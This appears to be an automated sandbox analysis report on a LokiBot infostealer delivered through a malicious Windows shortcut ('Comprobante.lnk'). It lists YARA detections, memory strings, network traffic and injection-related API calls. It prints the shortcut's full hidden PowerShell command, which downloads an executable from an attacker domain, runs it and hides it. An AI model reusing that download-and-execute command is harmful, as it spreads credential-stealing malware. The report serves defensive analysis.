Source: powershell.exe, 00000000.00000002.1464066335.0000020C4BB02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4B8D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4BB02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: mjtjewi.exe, mjtjewi.exe, 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: powershell.exe, 00000000.00000002.1507180884.0000020C63C17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.c
Source: powershell.exe, 00000000.00000002.1507180884.0000020C63C17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4CEF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sodiumlaurethsulfatedesyroyer.com
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4B8D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4CFC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4CFC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4CFC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4BB02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4C502000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1499571714.0000020C5BA82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1499571714.0000020C5B93F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1464066335.0000020C4CFC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4CC2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1464066335.0000020C4CEEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.sodiumlaurethsulfatedesyroyer.com
Source: powershell.exe, 00000000.00000002.1464066335.0000020C4B8D1000.00000004.00000800.00020000.00000000.sdmp, Comprobante.lnk.lnk	String found in binary or memory: https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrg

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.11:49710 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: mjtjewi.exe PID: 6956, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: mjtjewi.exe PID: 876, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

PE file contains section with special chars

Source: mjtjewi.exe.0.dr

Static PE information: section name: j1CM!e^U

PE file has nameless sections

Source: mjtjewi.exe.0.dr

Static PE information: section name:

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Desktop\mjtjewi.exe

Jump to dropped file

Windows shortcut file (LNK) contains suspicious command line arguments

Source: Comprobante.lnk.lnk

LNK file: -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';

Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9DBB0 NtResumeThread,	4_2_0AC9DBB0
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9DB59 NtResumeThread,	4_2_0AC9DB59
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9D9F8 NtReadVirtualMemory,	4_2_0AC9D9F8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9DF28 NtSetContextThread,	4_2_0AC9DF28
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9DDD0 NtWriteVirtualMemory,	4_2_0AC9DDD0
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9DBA8 NtResumeThread,	4_2_0AC9DBA8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9D9F0 NtReadVirtualMemory,	4_2_0AC9D9F0
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9DF21 NtSetContextThread,	4_2_0AC9DF21
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9DDC9 NtWriteVirtualMemory,	4_2_0AC9DDC9

Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01522D20	4_2_01522D20
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0152B5B8	4_2_0152B5B8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0152B858	4_2_0152B858
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0152D038	4_2_0152D038
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_015224D8	4_2_015224D8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_015208E1	4_2_015208E1
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01523760	4_2_01523760
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01526F28	4_2_01526F28
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_015246C0	4_2_015246C0
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01526D58	4_2_01526D58
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01526D48	4_2_01526D48
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_015245F1	4_2_015245F1
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_015231E8	4_2_015231E8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0152459F	4_2_0152459F
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01526870	4_2_01526870
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01522462	4_2_01522462
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01526862	4_2_01526862
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_015218CF	4_2_015218CF
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0152A668	4_2_0152A668
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01526A90	4_2_01526A90
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01526A80	4_2_01526A80
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF92E0	4_2_02DF92E0
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF8392	4_2_02DF8392
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF7088	4_2_02DF7088
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF5520	4_2_02DF5520
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF7918	4_2_02DF7918
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF92B9	4_2_02DF92B9
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DFA218	4_2_02DFA218
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DFF218	4_2_02DFF218
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DFA208	4_2_02DFA208
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF7358	4_2_02DF7358
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF0310	4_2_02DF0310
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF0320	4_2_02DF0320
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF7053	4_2_02DF7053
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DFB611	4_2_02DFB611
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DFB620	4_2_02DFB620
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF1778	4_2_02DF1778
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF176A	4_2_02DF176A
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DFBA88	4_2_02DFBA88
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DFB8B8	4_2_02DFB8B8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DFB8A8	4_2_02DFB8A8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF19D8	4_2_02DF19D8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DF19C8	4_2_02DF19C8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_02DFAFF8	4_2_02DFAFF8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC90B88	4_2_0AC90B88
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9E081	4_2_0AC9E081
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9262E	4_2_0AC9262E
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9CDC0	4_2_0AC9CDC0
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC90B78	4_2_0AC90B78
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC90040	4_2_0AC90040
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC90006	4_2_0AC90006
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC91FC8	4_2_0AC91FC8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC91FB8	4_2_0AC91FB8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9BC1A	4_2_0AC9BC1A
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AC9CD8E	4_2_0AC9CD8E
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AF50040	4_2_0AF50040
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_0AF50006	4_2_0AF50006
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 6_2_0040549C	6_2_0040549C
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 6_2_004029D4	6_2_004029D4

Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: String function: 00405B6F appears 42 times

Source: mjtjewi.exe.0.dr

Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
